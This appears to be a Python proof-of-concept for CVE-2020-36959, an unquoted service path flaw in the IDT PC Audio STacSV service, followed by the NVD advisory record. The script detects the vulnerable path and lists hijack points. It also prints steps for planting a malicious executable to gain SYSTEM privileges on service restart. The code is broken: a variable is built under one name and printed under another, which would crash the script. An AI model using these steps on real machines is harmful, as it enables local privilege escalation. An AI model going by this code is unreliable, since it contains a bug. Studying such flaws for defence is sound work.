CVE-2020-36959

#!/usr/bin/env python3 """ CVE-2020-36959 PoC - IDT PC Audio STacSV Unquoted Service Path This script checks for the vulnerable service path and demonstrates exploitation. Note: This is for educational and authorized testing purposes only. """ import subprocess import os import sys def check_vulnerable_path(): """ Check if the STacSV service has an unquoted path with spaces. Typical vulnerable path: C:\Program Files\IDT Corporation\IDT PC Audio\STacSV.exe """ try: # Query the STacSV service configuration using WMIC or sc command result = subprocess.run( ['sc', 'qc', 'STacSV'], capture_output=True, text=True, timeout=30 ) if result.returncode == 0: output = result.stdout print("[+] STacSV service found") # Extract BINARY_PATH_NAME for line in output.split('\n'): if 'BINARY_PATH_NAME' in line: path = line.split(':', 1)[1].strip() print(f"[+] Current path: {path}") # Check for unquoted path with spaces if ' ' in path and not path.startswith('"'): print("[!] VULNERABLE: Path contains spaces without quotes") # Parse path components path_parts = path.split('\\') potential_Hijack_points = [] current_path = "" for i, part in enumerate(path_parts[:-1]): if i == 0: current_path = part else: current_path += "\\" + part # Check if current path contains spaces (potential hijack point) if ' ' in current_path and '.' not in part: exe_name = path_parts[i + 1].split()[0] # Get first part before space hijack_path = current_path + "\\" + exe_name + ".exe" potential_Hijack_points.append(hijack_path) print(f"[!] Potential hijack points: {potential_hijack_points}") return True else: print("[-] STacSV service not found or access denied") return False except Exception as e: print(f"[-] Error: {e}") return False def generate_payload(target_path): """ Generate a simple reverse shell payload for demonstration. In real attack, this would be a malicious executable. """ print(f"[!] To exploit, place a malicious executable at one of the hijack points") print(f"[!] Example: Copy malicious.exe to {target_path}") print("[!] When service restarts, the malicious code will execute as SYSTEM") if __name__ == "__main__": print("=" * 60) print("CVE-2020-36959 - IDT PC Audio STacSV Unquoted Service Path") print("=" * 60) if os.name == 'nt': vulnerable = check_vulnerable_path() if vulnerable: print("\n[!] System is vulnerable to CVE-2020-36959") else: print("[-] This PoC only works on Windows systems")

{"cve": {"id": "CVE-2020-36959", "sourceIdentifier": "[email protected]", "published": "2026-01-26T18:16:26.840", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "IDT PC Audio 1.0.6499.0 contains an unquoted service path vulnerability that allows local users to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted path in the STacSV service to inject malicious code that would execute with LocalSystem account permissions during service startup."}, {"lang": "es", "value": "IDT PC Audio 1.0.6499.0 contiene una vulnerabilidad de ruta de servicio sin comillas que permite a usuarios locales ejecutar potencialmente código arbitrario con privilegios de sistema elevados. Los atacantes pueden explotar la ruta sin comillas en el servicio STacSV para inyectar código malicioso que se ejecutaría con permisos de la cuenta LocalSystem durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/49191", "source": "[email protected]"}, {"url": "https://www.pconlife.com/download/otherfile/20566/90674cffc8658c4f2bf58d43bb9b7ccb/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/idt-pc-audio-stacsv-unquoted-service-path", "source": "[email protected]"}]}}